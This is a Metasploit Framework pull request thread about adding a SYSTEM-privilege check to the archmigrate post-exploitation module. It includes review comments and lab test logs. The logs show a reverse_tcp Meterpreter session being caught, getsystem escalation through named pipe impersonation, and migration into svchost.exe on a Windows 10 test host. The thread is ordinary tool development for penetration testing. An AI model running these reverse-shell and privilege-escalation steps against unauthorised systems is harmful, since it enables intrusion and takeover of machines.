Add privilege check to archmigrate
rapid7/metasploit-framework pull request #8378
Opened 2017-05-13 18:43 UTC by thecarterb

This PR adds a privilege level check to `archmigrate`. Using the `IGNORE_SYSTEM` datastore option, the user can choose to migrate even if the session has `SYSTEM` privileges. This can prevent accidentally losing `SYSTEM` privileges on a session. If the specified session is not running as `SYSTEM`, the migration will continue.

## Verification

- [ ] Start `msfconsole`
- [ ] Somehow get SYSTEM on a session
- [ ] Do `use post/windows/manage/archmigrate`
- [ ] set `IGNORE_SYSTEM` false (if you want to check for SYSTEM)
- [ ] Do `run`
- [ ] Depending on your privileges and the `IGNORE_SYSTEM` option, you will receive warnings/messages

## Examples

#### `IGNORE_SYSTEM: false` and is `SYSTEM`

```
msf post(archmigrate) > options

Module options (post/windows/manage/archmigrate):

   Name           Current Setting                   Required  Description
   ----           ---------------                   --------  -----------
   EXE            C:\windows\sysnative\svchost.exe  yes       The executable to start and migrate into
   FALLBACK       true                              yes       If the selected migration executable does not exist fallback to a sysnative file
   IGNORE_SYSTEM  true                              yes       Migrate even if you have system priveleges
   SESSION        6                                 yes       The session to run this module on.

msf post(archmigrate) > set IGNORE_SYSTEM false
IGNORE_SYSTEM => false
msf post(archmigrate) > run

[-] You are running as SYSTEM! Aborting migration.
[*] Post module execution completed
msf post(archmigrate) >
```

#### `IGNORE_SYSTEM: false` and is _not_ `SYSTEM` 

```
msf post(archmigrate) > run

[*] You're not running as SYSTEM. Moving on...
[+] The meterpreter is the same architecture as the OS!
[*] Post module execution completed
msf post(archmigrate) >
```

2017-05-15 04:24 UTC, wvu-r7 commented on modules/post/windows/manage/archmigrate.rb
> +        OptBool.new('IGNORE_SYSTEM', [true, 'Migrate even if you have system priveleges', true])
s/system/SYSTEM/; s/priveleges/privileges/

2017-05-15 04:24 UTC, wvu-r7 commented on modules/post/windows/manage/archmigrate.rb
> +        print_error('You are running as SYSTEM! You will lose your priveleges!')
Same here.

2017-05-23 18:35 UTC, bwatters-r7 commented
@thecarterb is there a reason the default behavior is to not remind?  I'd think that it makes more sense to warn someone a hundred times than to let them screw themselves once.  I mean, I can completely understand the "You're using a hacking too, you should understand" mentality, but then why add this setting at all?   To be clear, I like this, and I think the warning is justified; I just think the default value should be true.  Am I missing something?

2017-05-23 18:40 UTC, thecarterb commented
I think I flipped my logic when originally making that options. Ill change it in a sec. Good catch!

2017-05-23 18:51 UTC, bwatters-r7 commented
@thecarterb awesome; thanks!  I'll get on with testing this

2017-05-23 19:04 UTC, bwatters-r7 commented
# Testing
## Windows 10x64 not system
```
msf auxiliary(smb_login) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(handler) > set lport 4567
lport => 4567
msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49778) at 2017-05-23 13:54:46 -0500

meterpreter > sysinfo
Computer        : DESKTOP-OQBO9P9
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage
[-] Failed to load module: post/windows/manage
msf exploit(handler) > use post/windows/manage/archmigrate 
msf post(archmigrate) > show options

Module options (post/windows/manage/archmigrate):

   Name           Current Setting                   Required  Description
   ----           ---------------                   --------  -----------
   EXE            C:\windows\sysnative\svchost.exe  yes       The executable to start and migrate into
   FALLBACK       true                              yes       If the selected migration executable does not exist fallback to a sysnative file
   IGNORE_SYSTEM  false                             yes       Migrate even if you have SYSTEM privileges
   SESSION                                          yes       The session to run this module on.

msf post(archmigrate) > set session 1
session => 1
msf post(archmigrate) > run

[*] You're not running as SYSTEM. Moving on...
[*] The meterpreter is not the same architecture as the OS! Upgrading!
[*] Starting new x64 process C:\windows\sysnative\svchost.exe
[+] Got pid 2716
[*] Migrating..
[+] Success!
[*] Post module execution completed
msf post(archmigrate) > exit

```

## Win10x64 as system
```
msf auxiliary(smb_login) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lport 4567
lport => 4567
msf exploit(handler) > set lhost <MSF_IP>
lhost => <MSF_IP>
msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49779) at 2017-05-23 14:00:01 -0500

meterpreter > sysinfo
Computer        : DESKTOP-OQBO9P9
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-OQBO9P9\bwatters
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use post/windows/manage/archmigrate 
msf post(archmigrate) > show options

Module options (post/windows/manage/archmigrate):

   Name           Current Setting                   Required  Description
   ----           ---------------                   --------  -----------
   EXE            C:\windows\sysnative\svchost.exe  yes       The executable to start and migrate into
   FALLBACK       true                              yes       If the selected migration executable does not exist fallback to a sysnative file
   IGNORE_SYSTEM  false                             yes       Migrate even if you have SYSTEM privileges
   SESSION                                          yes       The session to run this module on.

msf post(archmigrate) > set session 1
session => 1
msf post(archmigrate) > run

[-] You are running as SYSTEM! Aborting migration.
[*] Post module execution completed
msf post(archmigrate) > set IGNORE_SYSTEM true
IGNORE_SYSTEM => true
msf post(archmigrate) > show options

Module options (post/windows/manage/archmigrate):

   Name           Current Setting                   Required  Description
   ----           ---------------                   --------  -----------
   EXE            C:\windows\sysnative\svchost.exe  yes       The executable to start and migrate into
   FALLBACK       true                              yes       If the selected migration executable does not exist fallback to a sysnative file
   IGNORE_SYSTEM  true                              yes       Migrate even if you have SYSTEM privileges
   SESSION        1                                 yes       The session to run this module on.

msf post(archmigrate) > run

[*] The meterpreter is not the same architecture as the OS! Upgrading!
[*] Starting new x64 process C:\windows\sysnative\svchost.exe
[+] Got pid 2328
[*] Migrating..
[+] Success!
[*] Post module execution completed

msf post(archmigrate) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-OQBO9P9
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 
```

2017-05-23 19:06 UTC, thecarterb commented
Looks all good to me. Should I add a warning even if `IGNORE_SYSTEM` is `true`?

2017-05-23 19:10 UTC, thecarterb commented
Scratch that, I just noticed that the warning isn't showing for some reason. I'll test this when I get home

2017-05-23 19:12 UTC, bwatters-r7 requested changes
Some rubocop stuff

2017-05-23 19:12 UTC, bwatters-r7 commented on modules/post/windows/manage/archmigrate.rb
> +
I know I'm nitpicking here, but why the extra white space?

2017-05-23 19:12 UTC, bwatters-r7 commented on modules/post/windows/manage/archmigrate.rb
> +      if datastore['IGNORE_SYSTEM']
This should be indented 2 spaces

2017-05-23 19:20 UTC, bwatters-r7 commented
@thecarterb I could go either way on a warning if IGNORE_SYSTEM is true.  I figure they've actively opted out at that point, but a single line is not really that big a deal, either.

2017-05-23 19:39 UTC, bwatters-r7 approved these changes

2017-05-23 19:40 UTC, merged

2017-05-30 23:02 UTC, alrosenthal-r7 commented
# Release Notes

A privilege level check has been added to the post/windows/manage/archmigrat module. Using the IGNORE_SYSTEM datastore option, you can choose to migrate even if the session has SYSTEM privileges. This can prevent accidentally losing SYSTEM privileges on a session. If the specified session is not running as SYSTEM, the migration will continue.

2019-02-07 17:00 UTC, cnotin commented
Hi @cbrnrd I was curious about this option. For me if we're SYSTEM and spawn a new process to migrate into, we'll keep SYSTEM privileges. This is what I observed in my testing too.
Do you know when it could not be the case?

2019-02-07 17:33 UTC, cbrnrd commented
I've had it happen to me in the past (a year or so ago when I opened this
PR). Something might have changed where the permissions are retained.

On Thu, Feb 7, 2019 at 12:01 PM Clément Notin <notifications@github.com>
wrote:

> Hi @cbrnrd <https://github.com/cbrnrd> I was curious about this option.
> For me if we're SYSTEM and spawn a new process to migrate into, we'll keep
> SYSTEM privileges. This is what I observed in my testing too.
> Do you know when it could not be the case?
>
> —
> You are receiving this because you were mentioned.
> Reply to this email directly, view it on GitHub
> <https://github.com/rapid7/metasploit-framework/pull/8378#issuecomment-461511082>,
> or mute the thread
> <https://github.com/notifications/unsubscribe-auth/AQL0LkO_Ewgidll-wumzrt3xCjlGJjLmks5vLFvtgaJpZM4NaKB2>
> .
>

2019-02-07 17:36 UTC, cnotin commented
Thanks for your answer. For me when we spawn a process SYSTEM it runs as SYSTEM too. But if you encountered this problem, fine :)